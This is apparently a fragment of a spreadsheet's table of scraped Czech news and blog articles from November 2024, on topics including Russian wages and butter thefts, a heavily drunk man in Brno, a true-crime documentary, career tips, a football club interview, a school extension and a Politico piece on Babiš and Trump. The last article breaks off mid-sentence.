    <t>Rus Bocharov: Moje máma bere důchod čtyři tisíce korun měsíčně! To je pádná odpověď těm, kteří tvrdí, jak je v Rusku skvěle. Když ovšem hlásám, jaké jsou v Rusku ceny, tak je třeba i říci, že tamní platy jsou mizerné. Proto se nelze divit, že v Rusku se rozmohly velké máslové loupeže i za použití zbraní. Běžné platy v Rusku mimo centra, jako jsou Moskva nebo Sankt Petěrburg, činí v přepočtu kolem osmi tisíc korun měsíčně, uvedl už dříve Rus Anton Bocharov, který žije a pracuje v ČR, v rozhovoru, jenž jsem už dříve zveřejnil na blogu iDNES.cz. Jeho máma žijící v městě Ivanovo vzdáleného 300 km od Moskvy bere za celoživotní desítky let trvající dřinu důchod v přepočtu kolem 4000 Kč měsíčně, což je v Rusku běžné. Žádná sláva. Všechno souvisí se vším, a tak se nelze divit tomu, že když nyní v Rusku prudce vzrostly ceny másla, tak se tam krade ve velkém, jak uvádí web ctidoma.cz. A někdy z toho bývá i pořádné akční drama. V jednom z tamních supermarketů Pjateročka se podle informací ruského serveru Meduza pokusili dva muži uloupit celkem 25 balení másla. Podle záznamů z bezpečnostních kamer si je měli nenápadně strkat do batohu a do kapes, dokud je nepřistihla zaměstnankyně marketu. Ta se je pokoušela konfrontovat, ale muži na ni zaútočili pěstmi, a dokonce ji ohrožovali nožem. Nakonec z marketu utekli. Policie je zadržela o několik hodin později, za ozbrojené přepadení jim hrozí až 10 let vězení. Cena za kostku másla v Rusku průměrně v přepočtu 46 korun se na naše poměry může zdát nízká, jsou tu ale dvě ale. To první, ruské kostky másla váží pouze 180 gramů oproti naším běžným 250 gramům, to druhé, už zmíněné výše ruských platů, které jsou proti českým podstatně nižší. Takže v regálech bývají vystaveny pouhé obaly a samotný produkt se vydává až na pokladně. A to je další pádná odpověď na bludy páně Meduly, které publikoval na blogu iDNES.cz. Panu Bocharovovi stačily dvě věty, máma bere důchod čtyři tisíce korun měsíčně, lidé si běžně vydělají kolem osmi tisíc korun měsíčně. Oficiální výše ruských platů a důchodů nelze brát vážně, jsou zkreslovány Moskvou , Sankt Petěrburgem a některými bohatšími regiony, kde se těží nerostné suroviny, Z další, ruské oficiální statistiky bývají zkreslené a lze je brát vážně asi jako věštění kartářky. Samotné ceny a stejně tak výše pouhých platů nemají vypovídající hodnotu. Je potřeba porovnávat obojí, když chci mít přehled. Teď z vlastní zkušenosti, prodloužený víkend jsem s partnerkou a jejím synem strávil na Šumavě . Jeden den jsme vyrazili na výlet do Německa , kde si dali oběd v takové útulné stylové bavorské hospůdce. Pivo tam stálo v přepočtu zhruba 150 korun za půl litr, vepřo, knedlo, zelo asi 430 korun. Mě by ale fakt nepadlo vykládat, jací ti Němci jsou chudáci, když tam mají tak drahé hospody. Zdroje: Anton Bocharov: V Rusku je učitel žebrák, žáci mu musí dávat peníze - Blog iDNES.cz https://www.ctidoma.cz/clanek/publicistika/kvuli-maslu-do-kriminalu-cena-teto-potraviny-trha-rekordy-79445 V Moskvě byla spáchána loupež na Pjateroči. Ukradených 25 balíčků másla — Meduza Rusko 2024 - speciální turistická operace ukončena - Blog iDNES.cz</t>
  </si>
  <si>
    <t>20241101_88_3264624022_bf686800879187fa2a5b.html</t>
  </si>
  <si>
    <t>bf686800879187fa2a5b</t>
  </si>
  <si>
    <t>Opilec ležel u kolejí, nestačilo mu ani rozpětí testeru na alkohol</t>
  </si>
  <si>
    <t>Opilec ležel u kolejí, nestačilo mu ani rozpětí testeru na alkohol 1. 11. 2024 Ivana Repíková Jihomoravský kraj, KRIMI Ilustrační foto BRNO – S neuvěřitelným případem, se kterým se ještě nikdy nesetkali, se museli vypořádat strážníci ve čtvrtek odpoledne v Řečkovicích. U kolejí ležel na mol opilý muž, kterému nestačilo rozpětí testeru na alkohol . Řidička dopravního podniku se obrátila na městskou policii. Řešila Brňana, který ležel v blízkosti kolejí. Odtáhla ho proto s pomocí cestujícího, ale měla strach, aby se tam nevrátil a neohrozil svůj život. Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k provedení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu nedokáže ani změřit. „Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile,“ nechápe tiskový mluvčí Jakub Ghanem. Strážníci proto muži zavolali sanitku a s časovým rozestupem nechali dotyčného znovu dýchnout. Zobrazil extrémní hodnotu 5, 38 promile, která pro nenavyklého člověka může být smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice. Navíc je podezřelý z porušení tabákového zákona a hrozí mu pokuta až dvacet tisíc korun. Staňte se členy FB skupiny Život v Jihomoravském kraji a žádná zpráva z kraje vám neunikne. Sledujte nás na síti X, kde pro vás připravujeme plejádu pestrých zpráv. Jihomoravský kraj BRNO – Svůj rodičovský um předvedla pětačtyřicetiletá žena v Nádražní ulici. Nejprve nasedla do cizího auta, poté tahala svého syna v mrazivém počasí jen v […] Jihomoravský kraj BRNO – Personál supermarketu v Novém Lískovci se velmi divil, kam se za posledního půl roku podělo několik desítek kusů nákupních vozíků. Vysvětlení na sebe […] Jihomoravský kraj Autor: Ivana Repíková Autor person Ivana Repíková Rubrika transition_slide Jihomoravský kraj</t>
  </si>
  <si>
    <t>20241101_89_3264788629_45838436d064b84ed4e0.html</t>
  </si>
  <si>
    <t>45838436d064b84ed4e0</t>
  </si>
  <si>
    <t>Bez lítosti 2: Brutálně uškrtil dvě ženy, ale úsměv mu ani v doživotní base z tváře nezmizel</t>
  </si>
  <si>
    <t>Bez lítosti 2: Brutálně uškrtil dvě ženy, ale úsměv mu ani v doživotní base z tváře nezmizel Publikováno: 1. listopadu 2024, 17:30 Komentáře Dokumentární série Bez lítosti si vysloužila druhou sérii, která připomene divákům několik zločinů, které šokovaly veřejnost a zapsaly se do dějin kriminalistiky. V první epizodě poodhalí divákům své vražedné řádění na doživotí odsouzený vrah Karel Šťovíček. V nápravných zařízeních v Česku pobývá více než 22 tisíc lidí, 49 z nich si odpykává doživotní trest za obzvlášť závažné zločiny. Projekt Bez lítosti představí 8 takových jedinců, jejichž činy se dostaly do popředí zájmu médií. Vraždění Karla Šťovíčka je specifické v tom, že kriminalisté se na něj zaměřili už po první vraždě, ale nezískali dost důkazů, aby ho mohli držet pod zámkem. Kdyby se tak stalo, život druhé ženy by nevyhasl násilnou smrtí. Celý příběh je tak obyčejný, až je děsivý, a klidně by mohl posloužit jako námět pro kriminální thriller. První vražda V létě se do Rovenska pod Troskami vypravila Lucie se svým přítelem a dvěma dětmi. Pobyt, který měl být nezapomenutelnou rodinnou dovolenou, se bohužel nevyvedl a Lucie se ten osudný den s přítelem několikrát pohádala. Příteli vadilo, že Lucie neskrývala zájem o jiného muže, se kterým se potkali v restauraci. Právě kvůli hádce se Lucie vydala do restaurace sama, aby se pobavila. Netušila, že se jí zalíbil její vrah. Karel Šťovíček už tenkrát nebyl bez viny. Ve 20 letech zavraždil spolu s přítelkyní seniora a za obzvláště trýznivou smrt skončil na 16 let ve vězení. Někdo by se možná po odpykání trestu snažil začít znovu a lépe, ale Šťovíček zřejmě pobyt ve vězení, který mu vzal nejlepší roky života, nepovažoval za nijak špatný a rozhodně se nepoučil. Když koncem července 2020 vešel do restaurace, neušlo mu, že si jeho urostlou postavu prohlížela žena. Jak vypozoroval během večera, byla zadaná. To mu ale nijak nebránilo ji v okamžiku, kdy přišla do lokálu sama, oslovit. Lucie mu nedala košem a ještě ho pozvala na pár skleniček. Související článek Nejdrsnější věznice světa Grónsko : Pokud to neuvidíte, tak tomu neuvěříte Grónsko je autonomní oblastí Dánského království. Pouhých 15 % ostrova, který má rozlohu přes 2 miliony kilometrů čtverečních, není pokryté ledem. V… V obyčejném světě by muž využil náklonnosti ženy na dovolené, užil by si a ona by se vrátila k dětem a partnerovi. Tentokrát to bylo jinak. Procházka v parku nebyla plná romantiky, ale v době vyšetřování vraždy Lucie kriminalisté netušili, co se mohlo v parku odehrát, když situace vyústila ve vraždu. Jednou z variant bylo, že muž požadoval orální sex, což žena nakonec asi vykonala nedobrovolně. Možná začala muži vyhrožovat a on situaci neustál. Lahev vína , kterou si Šťovíček vzal z restaurace, se stala smrtící zbraní. Ve chvíli, kdy se Lucie otočila, dostala ránu do hlavy. Nakonec ji muž ještě škrtil ledvinkou a potom ji odnesl na pole, kde ji nechal. Vše se zkomplikovalo, když uražený přítel Lucie čekal dva dny, než její zmizení ohlásil. Partner zavražděné byl podezřelý, ale nakonec bylo jasné, že on s vraždou nic společného nemá. Související článek Nejdrsnější věznice světa (Halden): Norsko vsadilo na slušnost a příjemné prostředí a funguje to Tento skandinávský stát se řadí na deváté místo v Evropě , pokud jde o velikost. Jde o hornatou krajinu. Země bohatne z těžby ropy. podle statistik z… Šťovíček byl přesvědčený o tom, že ho vyšetřovatelé neusvědčí, a klidně zůstal v Českém ráji. Něco z prožitého večera se mu muselo zalíbit. Netrvalo ani čtrnáct dní, aby se znovu vydal na lov. V Turnově si vyhlédl v baru Stanislavu. A opět následovala procházka, tentokrát po břehu řeky Jizery . I tam došlo k intimnostem a poté k vraždě. Tělo ženy skončilo v řece, kde ho našli náhodní kolemjdoucí druhý den. Karel Šťovíček už jim v děravých sítích justice neuplaval. V kraji se o něm jako o vrahovi mluvilo už po první vraždě. Důkazy však nestačily a nikdo se nenamáhal ho alespoň z dálky sledovat. Očekávání novinářů a veřejnosti bylo velké. Soudní řízení mělo trvat týdny. Karel Šťovíček se však u soudu moc neohřál. Sám, aniž by se poradil s advokátem, souhlasil s doživotním trestem a rozsudek byl v tom okamžiku pravomocný. Pořad je v nabídce prima+. Reakce k článku Autor: Lída Kropáčková Autor person Lída Kropáčková</t>
  </si>
  <si>
    <t>76560</t>
  </si>
  <si>
    <t>20241101_9_3628174783_c3e1540644cc8da6e1b8.html</t>
  </si>
  <si>
    <t>c3e1540644cc8da6e1b8</t>
  </si>
  <si>
    <t>Co změnit ve svém životním stylu, aby se vaše kariéra konečně posunula</t>
  </si>
  <si>
    <t>Co změnit ve svém životním stylu, aby se vaše kariéra konečně posunula Máte pocit, že na kariérním žebříčku stagnujete nebo se váš podnik potřebuje posunout dál? Možná je to vaším životním stylem. Kariéra Foto: Shutterstock Daniela Straková 01. 11. 2024 Ať už patříte k lidem, kteří touží postoupit po korporátním žebříčku, nebo naopak chcete vybudovat úspěšný vlastní byznys, bez určitých změn v životním stylu to nepůjde. Denní návyky formují i naši pracovní rutinu: zlozvyky nás brzdí, zatímco některé volby v oblasti životního stylu mohou zásadně ovlivnit i naši kariérní dráhu. Reklama Móda a krása 1. Pracujte na své sebedůvěře: právě ona je klíčem ke kariérním úspěchům. Bez víry ve své schopnosti nemáte šanci vybudovat úspěšný podnik ani se posunout ve velké firmě. Jen lidé se zdravou sebedůvěrou jsou schopni nabídnout kreativní a efektní řešení, chopit se příležitostí, které jsou pro jejich kariéru prospěšné, a nezaleknout se u každé překážky. Pokud cítíte, že vám sebedůvěra z principu chybí, pracujte na ní: na trhu je bezpočet knížek, ale také koučů a terapeutů. 2. Nezanedbávejte své fyzické zdraví. Je to jeden ze základních pilířů zdravé sebedůvěry. Tělo máme jenom jedno a mělo by fungovat co nejlépe. Dbejte na správnou životosprávu, omezte alkohol a cigarety a věnujte se pravidelnému cvičení, které vám dodá energii a přidá na produktivitě. 3. Investujte do sebe. S tím souvisejí i předešlé body. Úspěch obvykle nepřichází zdarma a bude to vyžadovat váš čas i peníze, abyste rozšířila svoje vzdělání, doplnila nové dovednosti, získala potřebné diplomy nebo certifikáty. 4. Převezměte zodpovědnost. Není to lehký úkol, jelikož je potřeba přihlásit se ke svým chybám, nevymlouvat se a neházet to na kolegy. Nikdo není dokonalý - ideální reakcí je proto uznat svůj omyl a pokusit se o co nejrychlejší nápravu. Poučte se z chyb do budoucna a aktivně se jich snažte vyvarovat. 5. Plánujte a organizujte. Každý máme k dispozici jen omezený čas, takže to, jak si jej rozvrhnete, má zásadní vliv na vaši kariéru. Sestavte si žebříček priorit každé ráno a postupujte od toho nejdůležitějšího úkolu. Začněte hned zrána, abyste získala náskok a využila den co nejproduktivněji. 6. Mějte přehled o svých financích. Přežíváte od výplaty k výplatě? Něco bude nejspíš špatně. Pokud vyděláváte adekvátně své profesi, chyba bude nejspíš v tom, že utrácíte víc, než je potřeba. Udělejte si podrobný rozpočet a důkladně zvažte své výdaje - tento krok je stejně nevyhnutelný v případě, že vedete vlastní podnik. Adekvátní management financí vám pomůže soustředit tok peněz směrem k úspěchu, místo toho, abyste utrácela za zbytečnosti. 7. Nezapomeňte odpočívat. Ačkoli jsou rady ke kariérnímu postupu obvykle dravé, ničeho se vám nepovede dosáhnout ve stavu absolutního vyčerpání. Život není jenom o práci; dbejte na dodržování pracovních hodin, dopřejte si ideálně i luxus nezvedat telefony a dopřejte si čas určený jen vám, rodině a přátelům. Teprve pak se budete moct lépe soustředit na svou práci. Autor: Daniela Straková Autor person Daniela Straková Rubrika transition_slide Kariéra</t>
  </si>
  <si>
    <t>27390</t>
  </si>
  <si>
    <t>40690</t>
  </si>
  <si>
    <t>20241101_90_3248308772_2574e41db5c21c6ed2af.html</t>
  </si>
  <si>
    <t>2574e41db5c21c6ed2af</t>
  </si>
  <si>
    <t>Půlhodinka zábavy</t>
  </si>
  <si>
    <t>Půlhodinka zábavy Vzpomínáte si ještě na televizní seriál Sága rodu Forsythů (fórsajtů)? Byl tak populární, že si jeho název rozhlasáci upravili jako titul hlavního pořadu na Silvestra roku 1969. Zněl "Sága rodu Fórystů". My se teď v půlhodince zábavy ponoříme do jeho děje v době, kdy už moderátor Jiří Štuchal ohlašoval část avízovanou jako "mládeži nepřístupnou". Ale nebojte, na nic vážnějšího než na Vománkový víno nedojde... Rubrika transition_slide Ostatní zábavné pořady</t>
  </si>
  <si>
    <t>8520</t>
  </si>
  <si>
    <t>20241101_91_3264502918_f5d21a9dfb54c6b2f343.html</t>
  </si>
  <si>
    <t>f5d21a9dfb54c6b2f343</t>
  </si>
  <si>
    <t>Kristek odpověděl na dotazy. Jste s jeho názory spokojení? Straka má dál důvěru</t>
  </si>
  <si>
    <t>Kristek odpověděl na dotazy. Jste s jeho názory spokojení? Straka má dál důvěru Osobnost Deníku Fanoušci Dynama České Budějovice se chystají na neděli. Na zápas Libercem , který zase napoví, jak to je s možností záchrany jediného jihočeského prvoligového klubu. Jeho šéf Emil Kristek na klubové platformě odpovídal na dotazy. Zodpověděl všechny? Jste s jeho odpověďmi spokojení? Na webu Deníku je přinášíme v psané formě: Emil Kristek, šéf SK Dynamo České Budějovice : "Určitě se nějaké změny v kádru uskuteční. Naším cílem je posílit tým, abychom byli konkurenceschopní a mohli se udržet v první lize. Věříme, že se nám podaří přivést kvalitní hráče, kteří nám pomohou dosáhnout našich cílů." Co bude se závazky klubu? Závazky klubu postupně hradíme a řešíme. V minulé sezoně se stala nešťastná věc, že vlastně výdaje klubu výrazně převyšovaly příjmy klubu, a to až možná o několik desítek milionů korun. Teď to samozřejmě řešíme. Nestrkáme hlavu do písku. Snažíme se komunikovat s každým. Přitom ještě musíme vlastně řešit provoz a chod klubu, platit mzdy hráčů a zaměstnanců. Myslím si, že se nám to silou vůle daří a nebude to ještě jednoduché. Plně si to uvědomujeme, ale já nebo my všichni v klubu věříme, že se nám to podaří ustát. Pokud se podíváte na justici zpětně, na audity a hospodářské výsledky, tak tam to vše jasně hovoří. Myslím si, že teď nás čeká velmi těžké období do konce roku, ale věřím, že to zvládneme, protože na jaře máme daleko lepší vyhlídky, protože vlastně spousta firem má už určené marketingové plány na celý rok od začátku roku a teď už v některých těch firmách jakoby jsme začleněni na příští rok. Takže věříme, že to můžeme silou vůle zvládnout. Samozřejmě by nám velmi pomohlo sportovní sportovní zlepšení." Klubová vize Dynama? Na prvním místě je absolutní ekonomická stabilizace klubu. Bez ekonomické stabilizace klubu nebude vůbec nic. Zadruhé musíme udělat do poslední chvíle všechno, abychom sportovně se udrželi v první lize. Dokud to půjde, budeme pro to dělat maximum. Jako poslední část je naše klubová akademie, výchova mladých hráčů, podpora mladých hráčů a už jsme zahájili jednání jak s městem, tak s krajem a máme zájem o spolupráci, o společné dovybudování akademie jako tréninkového centra a Složiště. Přivedli jste od vašeho příchodu nějaké nové partnery? Všichni víme, že se nacházíme na posledním místě prvoligové tabulky. To je velmi složitá práce. Nicméně musím říct, že na tom obchodním poli se nám daří více a lépe než na tom sportovním. Od našeho příchodu se nám podařilo uzavřít skoro přes 30 reklamních nových partnerů. S dalšími jednáme. Tady nespíme. Určitě a opravdu se tomu věnujeme na plný plyn. Každý den. Tímto bych rád poděkoval všem partnerům i všem fanouškům, kteří chodí na fotbal či kterých si tady zaplatí pivo , koupí si klobásku, podpoří náš fanshop, když si někdo koupí šálu. Takže tady na tomto poli jsme opravdu na na na lepší vlně, než než na té sportovní. Zavedl jste v klubu platové stropy? Tato informace se ke mně ani nedostala a není to v žádném případě pravda. V našem týmu mají hráči velmi dobré podmínky. Troufám si říci, že od třeba takového šestého sedmého místa dolů mají srovnatelné podmínky s ostatními prvoligovými týmy. Samozřejmě, pokud by přišel nějaký rozdílový hráč, který, realizační tým doporučí, tak jsme samozřejmě připraveni ho zaplatit. To vůbec není žádná pravda. Vůbec nechápeme, kde kde se takovéto informace našly. Co klub plánuje na zimní přestupové okno? Realizační tým neustále monitoruje hráčský trh. Určitě nějaké hráčské změny proběhnou. Není ale pravda, že bychom klub chtěli rozprodat. V žádném případě. Monitoring probíhá. Neustále se o hráčích baví, takže až se to všechno ukončí, jsou s některými hráči už v kontaktu, to probíhá. Během podzimu jste odehráli několik přátelských zápasů s regionálními týmy. Jaký je jejich význam? Vlastně jsme chtěli trošku víc se přiblížit k těm regionálním klubům, aby viděly, že prostě s nimi chceme spolupracovat. Navíc je to i dobrý příslib do jejich pokladny finanční, protože tam přijdou lidi a docela jsme všechny ty stadiony i docela vyprodali, že tam přišlo hodně lidí. Lidi se mohou s hráči vyfotit, děti se mohou vyfotit s Františkem Strakou , s Jirkou Novotným . Je to i taková jakoby propagační záležitost klubu. Je to taková možnost, že třeba hráči, kteří nehrají v áčku, tak se mohou ukázat. Vyzkoušíme si spoustu variant. Sami jste viděli, že tam bylo spousta nových hráčů, dorostenců, hráčů z béčka. Díky tomu jsme se třeba mohli přesvědčit, že máme velký talent v brance. Honzu Volka. Přišel hrát z dorostu další hráč Jakub Zevl, Dominik Němec. Dostali všichni dokonce profesionální smlouvy. Díky tomu ti kluci pracují a je vidět, že prostě o něj zájem. Samozřejmě je to i důležité v tom vztahu, že třeba i to malé dítě bude chtít vidět to Dynamo naživo hrát jakoby v áčku. Tak řekne taťko, já se chci jet podívat na Dynamo. Myslím si, že v třeba v Třeboni , v Soběslavi , v Českém Krumlově byl velký zájem a že na jaře v tom budeme pokračovat a ještě třeba bychom chtěli, abychom měli připravený mobilní fanshop. Lidi by si tam mohli koupit šálu, dres, čepici. Takže v tom vidíme takový spíš potenciál, další spolupráci a komunikaci mezi námi a kluby. Po zápase na Slavii došlo k odvolání realizačního týmu. Proč? Chtěli jsme v týmu udělat nějaký impulz, jako se to dělá všude. Ale ten bohužel nepřinesl ten kýžený zvrat, který jsme očekávali. Ale to se nic dělat, to se prostě ve fotbale stává. I ve sportu. Nikde se nepíše, že by se jednou nemohl třeba Jirka Lerch vrátit. Nebo ostatní trenéři. Ještě bych jim tímto i rád poděkoval za to, že vlastně udrželi první ligu v Českých Budějovicích . To klobouk dolů, co se jim podařilo v jejich velmi těžkých podmínkách a s hráčským kádrem a materiálem, který měli. Takže za mě a za nás vlastně tady za všechny velké poděkování a respekt k tomu, co tu dokázali. A jak říkám znovu, nikde není napsáno, že se v budoucnu nemůžou vrátit do klubu. Co trenér František Straka ? Současný realizační tým Františka Straky má stále důvěru. Samozřejmě, bavíme se o tom i na představenstvu klubu, ale nebudeme měnit trenéry. Zanecháme to, protože zase nechceme každou chvíli tady měnit trenéry. To si myslím, že není úplně správné. Sami vidíte ten herní projev. Já vím, že to je taková fráze, že můžeme hrát dobře a prohráváme. Já bych taky radši hrál špatně a radši vyhrával. Anebo my všichni samozřejmě tady, ale momentálně v žádném případě o tom se ani nebavíme a spíš se bavíme o posílení, protože potřebujeme nějakého rozdílového hráče, nějakého útočníka, který opravdu ty góly bude dávat. Adediran nás přivádí k šílenství všechny. Protože jde třikrát sám na bránu a buď to dá do tyče, nebo to dá vedle, nebo nastřelí brankáře z metru. To už je prostě frustrující. Dneska na nás zívá celá brána, oni to nedají do prázdné. Musíme jenom doufat v to, že se to prostě jednou změní a že se nám to podaří to zlomit. Jaká byla a je situace okolo Kladrubského? Jsem docela rád, že se na to ptáte, protože de facto celá tato akce se vůbec netýkala Jirky Kladrubského, protože František Straka ho chtěl jako svého asistenta. Dokonce s Františkem Strakou jako první asistent odtrénoval jejich první trénink společný. A druhý den přišel sám, že se rozhodl, že nebude pokračovat. Všechny nás to zaskočilo. I přesto všechno jsme dlouho čekali na jeho návrat. Bohužel se tak nestalo. Několikrát jsme s ním hovořili, dokonce jsem Jirkovi nabídnul, aby pokračoval v akademii. Říkal, že si to promyslí, ale bohužel se mu potom stala nehoda, že si přetrhl achilovku. Jirka Kladrubský je samozřejmě legenda klubu. Je to prostě slušný člověk a Jirka tady má dveře otevřené vždycky, takže jenom čekáme, až se uzdraví a doufám, že vstoupíme do jednání, které bychom velmi rádi s ním obnovili. A máme zájem, aby tady Jirka Kladrubský pracoval u nás. Další otázka se týká kondičního trenéra. Proč ho Dynamo stále nemá? Kondičního trenéra si vyjednává realizační tým samostatně a už se blíží ke zdárnému konci. A myslím si, že v brzké době budeme mít kvalifikovaného trenéra kondičního. Co řeknete ke konfliktu s fanoušky? Já si myslím, že v médiích to bylo prezentováno až snad velikášsky a ono to tak vlastně až takové nebylo. Po zápase normálně minutu nebo dvě byli fanoušci ve svém sektoru, komunikovali s Františkem Strakou . Mluvili spolu. Podívejte se. Nás v klubu, a všechny, kteří sem chodí, prostě všechny štvou ty výsledky. Taky nás to zlobí, jsme z toho frustrovaní. Samozřejmě. Ale musíme jít dál. Co máme dělat? Já jsem strašně moc rád, že jsme se s Františkem s fanoušky setkali i v týdnu. Komunikujeme spolu, máme nějaký plán. Já doufám, že to všechno proběhne v naprosté pohodě a v pořádku. Chceme vítězit. Já to chápu. Všichni to chápeme, všichni chceme vítězit. To, co se tady děje, že jsme prostě prohráli tolik kol za sebou a dostáváme tolik branek. Na to díváme všichni. Vidíme to. Něco stavíte a pak najednou dostanete hloupý gól a všechno to spadne, a prostě to už prostě je tlak na psychiku. Ale já přes to všechno věřím, že se to zlomí a že prostě už gól dáme a věříme, že už prostě nějaká výhra musí přijít. To prostě není možné. To už by u nás při nás nemohl stát ani Pánbůh. To už prostě musí přijít. Věříme tomu. Klubu zatím chybí sportovní manažer, proto fanoušky zajímá, kdo v Dynamu vybírá hráče? Momentálně v Dynamu vybírá hráče samostatně realizační tým. V roli sportovního manažera by měl převzít v co nejkratší době nový sportovní manažer. Už s ním vyjednáváme a nejpozději od prosince by mohl, nebo od ledna, si myslím, že už na sto procent budeme mít sportovního manažera. Rád bych vzkázal fanouškům, aby zůstali věrní svému klubu. Autor: Kamil Jáša Autor Kamil Jáša</t>
  </si>
  <si>
    <t>16170.000000000002</t>
  </si>
  <si>
    <t>20241101_92_3264673149_314acf8ae976e9bf5d60.html</t>
  </si>
  <si>
    <t>314acf8ae976e9bf5d60</t>
  </si>
  <si>
    <t>Opilý muž v Brně nadýchal 5,38 promile, strážníkům nejdříve nestačil ani tester Foto: MP Brno Čtyřiapadesátiletý muž v brněnských Řečkovicích nadýchal 5,38 promile, což už je dávka alkoholu , která může být smrtelná. Strážníkům při prvotním měření nestačilo ani rozpětí testeru na alkohol , informoval mluvčí strážníků Jakub Ghanem. Ležel u tramvajových kolejí Hlídka strážníků přijela muže zkontrolovat do tramvajové smyčky v Řečkovicích ve čtvrtek v poledne po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně opilý. Měla obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. Měl zřejmě kolem 6 promile, přístroj to nedokázal změřit „Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile,“ uvedl mluvčí. Extrémní hodnota může být i smrtelná Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Houbař nadýchal skoro 9 promile Za hranici, při které hrozí upadnutí do bezvědomí a smrt, je považována hodnota čtyř promile. Někteří lidé jsou schopni snášet alkohol výrazně lépe. Příkladem je traktorista Milan Čurda , kterého před lety zadrželi policisté za volantem fekálního vozu, když nadýchal osm promile alkoholu . V roce 2018 lékaři ošetřovali houbaře z Ostravska se zlomeným kotníkem, který měl v krvi dokonce 8,83 promile alkoholu . Za světového rekordmana je považován Polák, který po oslavě s kamarády nadýchal 12,3 promile. Muž skončil v nemocnici Zdravotníci si muže v Brně převzali do své péče a po ošetření ho odvezli do nemocnice. Je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do 20 tisíc korun. Líbí se mi Autor: Ondřej Požár Autor person Ondřej Požár Rubrika transition_slide Brno-Řečkovice a Mokrá Hora</t>
  </si>
  <si>
    <t>2540</t>
  </si>
  <si>
    <t>20241101_93_3264910370_8e579428c9a1c7ff8455.html</t>
  </si>
  <si>
    <t>8e579428c9a1c7ff8455</t>
  </si>
  <si>
    <t>Základní škola v Lanškrouně se rozroste o čtyři nové třídy</t>
  </si>
  <si>
    <t>Základní škola v Lanškrouně se rozroste o čtyři nové třídy Publikováno Od Karel Janovský Zdroj: Krajský úřad Pardubice LANŠKROUN – Lepší podmínky pro vzdělávání dětí se zdravotním postižením přinese otevření čtyř nových učeben Základní školy v Lanškrouně . Realizace projektu na podporu speciálního školství začne v červnu příštího roku. Základní škola Olbrachtova řeší nedostatečnou kapacitu pro žáky přístavbou objektu. „Projekt Základní škola Lanškroun – přístavba školy Olbrachtova řeší nedostatečnou kapacitu pro vzdělávání přístavbou nového objektu. „V jednopodlažní budově čtvercového půdorysu, jež bude se stávající budovou propojena prosklenou chodbou, budou umístěny čtyři učebny – multisenzorická, ergoterapie, počítačová a logopedie. Nová bude také šatna a sociální zařízení včetně bezbariérového,“ řekl radní Pardubického kraje Josef Kozel . Pozor Aktualita: Žíznivý traktorista jel na jedno pivo traktorem do hospody Stavba má začít v červnu 2025 s tím, že postup prací bude záviset na provozu školy. Veškeré práce mají skončit v červnu 2026. „Provádění stavebních prací, zejména těch hlučnějších, by mělo probíhat v období prázdnin nebo víkendů. Škola je připravena akceptovat určitá omezení, nicméně musí v období školního roku zajistit výuku několika desítek žáků se zdravotním postižením,“ řekl náměstek hejtmana Pardubického kraje Dušan Salfický . Předpokládané náklady na celou stavbu jsou vyčísleny na třicet milionů korun včetně DPH. Celý článek zde: ZDROJ ZDE ….✅ REKLAMU ✅ můžete mít zde například formou zpětného odkazu více: Ceny reklamy …. Autor: Karel Janovský Autor person Karel Janovský</t>
  </si>
  <si>
    <t>20241101_94_3264509377_399a2f194274764b6607.html</t>
  </si>
  <si>
    <t>399a2f194274764b6607</t>
  </si>
  <si>
    <t>Pokud Trump padne, může utéct do Česka , píše Politico. V zemi má prý svůj „klon z Temu“ Příznivci republikána Donalda Trumpa a ani demokratky Kamaly Harrisové nemusí zoufat, pokud jejich kandidát v úterních amerických prezidentských volbách neuspěje – Evropa poskytuje dostatek útočišť pro oba tábory. Evropská mutace portálu Politico republikánům i demokratům nabízí hned několik států, kde se jim bude líbit. Republikánům doporučil Politico například Českou republiku , která má podle něj vlastní verzi Trumpa v podobě šéfa hnutí ANO a někdejšího premiéra Andreje Babiše . Mezi autory textu je i Ketrin Jochecová, která v minulosti spolupracovala jako mluvčí s ministerstvem vnitra spravovaným Vítem Rakušanem (STAN). „Pokud jen přehlédnete několik menších odlišností – například oranžovou tvář – Česko nabízí svého vlastního obchodního magnáta, který se přeměnil v politického žháře: Andreje Babiše , který se brzy bude ucházet o návrat do vysokého úřadu,“ napsal Politico . V odkazu na Trumpovo volební heslo Make America Great Again (udělat Ameriku znovu skvělou) poznamenal, že Babiš chce zase skvělou učinit Českou republiku . „Před volbami v příštím roce mu preference rostou,“ uvedl. Babiše portál označil za velkého příznivce nápadů republikánského střihu, jako jsou radikální přistěhovalecká politika a sliby snížení daní. „Má dokonce červenou kšiltovku s nápisem silné Česko, která připomíná Trumpovy ikonické čepice Make America Great Again,“ vysvětlil server americkým čtenářům. „Stačí mu jen říkat Trump z Temu,“ dodal. Temu je čínský internetový prodejce, který je vyhlášený levnými alternativami dražších výrobků. Temu má ale problémy s kvalitou a bezpečností některých produktů. Krajně pravicové skupině Proud Boys („hrdí hoši“), která stojí za Trumpem, Politico vybral Durynsko na východě Německa . Zdůvodňuje to tím, že zde poprvé od prvního úspěchu ve 30. letech 20. století zvítězila nacistická strana, jak označil Alternativu pro Německo (AfD). „Zastánci nadřazenosti bílé rasy zde rovnou najdou spojence,“ dodal. Trumpově dělnické třídě by se podle Politica mohlo líbit v Maďarsku , které označil za nový průmyslový ráj s automobilkami a továrnami na baterie a s vyspělou čínskou technologií a kapitálem. „Bohužel nemůžete nosit zbraně tak svobodně jako v USA , ale není zde smrtonosnější zbraně než doma pálené pálinky (ovocná pálenka) - díky (Viktoru) Orbánovi osvobozená od daní,“ uvedl server. Demokraté, kteří neuznávají hranice států, mohou po případném Trumpově 